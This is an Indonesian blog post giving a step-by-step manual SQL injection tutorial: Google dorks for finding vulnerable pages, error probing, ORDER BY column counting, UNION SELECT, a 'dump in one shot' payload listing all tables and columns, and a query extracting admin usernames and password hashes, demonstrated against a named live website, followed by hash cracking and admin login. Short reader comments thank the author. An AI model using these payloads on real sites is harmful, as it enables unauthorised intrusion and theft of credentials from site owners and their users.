Zone-Tecno
- Home
- About
- Contact
- Partner
- Disclaimer
- Privacy Policy
- Sitemap
- Terms Of Conditions
-
Settings
- Dark mode
Cara Manual Sql Injection With Dios
Palembang Cyber Team
<<Teknik manual sql injection with dios>>
Oke sedikit materi dri aku..
Mungkin materi ini sdah sering kalean denger dimna"
Tp Buat yg blom bza..
Gx ada salahnya kita belajar.. buat yg udh plo minggir dlu ea
Alat n bahan:
1.pc/hp
2.koneksi internet, nebeng wifi jg oke. Awokwkwk
3.kesabaran
Step by step:
1. Paling pertama dorking cuk..
Dork:
-inurl:index.php?id=
-inurl:trainers.php?id=
-inurl:buy.php?category=
-inurl:article.php?ID=
-inurl:lay_old.php?id=
Dst..
>> Cari web yg vuln..
Untuk Mengetahui Vuln Atau Tidak kalean Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh :
http://www.ilslbd.com/content.php?Id=4'
Nah spt itu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
jika sudah ketemu ,kalean tinggal masukan +order+by+1--+- ,Jadinya :
http://www.ilslbd.com/content.php?Id=4'+order+by+1--+-
Kalean terusin sampe nemu error ea..
http://www.ilslbd.com/content.php?Id=4'+order+by+2--+-
Ga error
http://www.ilslbd.com/content.php?Id=4'+order+by+3--+-
Ga error
http://www.ilslbd.com/content.php?Id=4'+order+by+4--+-
Error
Nah.. saya nemu error di nomor 4.
Disini bza diketahui bahwa Table nya ada 3(angka sebelum error), Jika Sudah Gitu kalean Tinggal ganti +order+by dengan +union+select,jangan lupa di kasih tanda (-) di depan angka id.
http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2,3--+-
Dan booom!!! Kluar tuh angka togel
Gua disini dpet angka togel 3
Ok. Sekarang gua masukin injectnya.
Inject:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Jadi,
http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2, (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)--+-
Nah Disini Kalian Akan Lihat Banyak Table Table, Carilah Table Yang ada username dan password nya.
Klo udah nemu..
Tinggal kalean dump.
Caranya Dengan Masukan Inject:
/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/
Disini user dan password gua di Table admin dan nama columnnya UserName dan Password. Jadi gua edit inject nya jadi
/*!50000(SELECT+GROUP_CONCAT([UserName],0x3a,[Password]+SEPARATOR+0x3c62723e)+FROM+[admin])*/
Nb: ganti tanda [] dg table yg lu temu cuk..
http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2, /*!50000(SELECT+GROUP_CONCAT([UserName],0x3a,[Password]+SEPARATOR+0x3c62723e)+FROM+[admin])*/--+-
Stelah nemu.. hash pw di hashkiller.co.uk
Dan cari admin login. Done!
-==Gatra==-
Baca juga
3 comments
TerimaKasihKa-
ReplyDeleteMastah ku
ReplyDeleteKntl enak d bkn tutor youtube b mek dx paham2 aku
ReplyDelete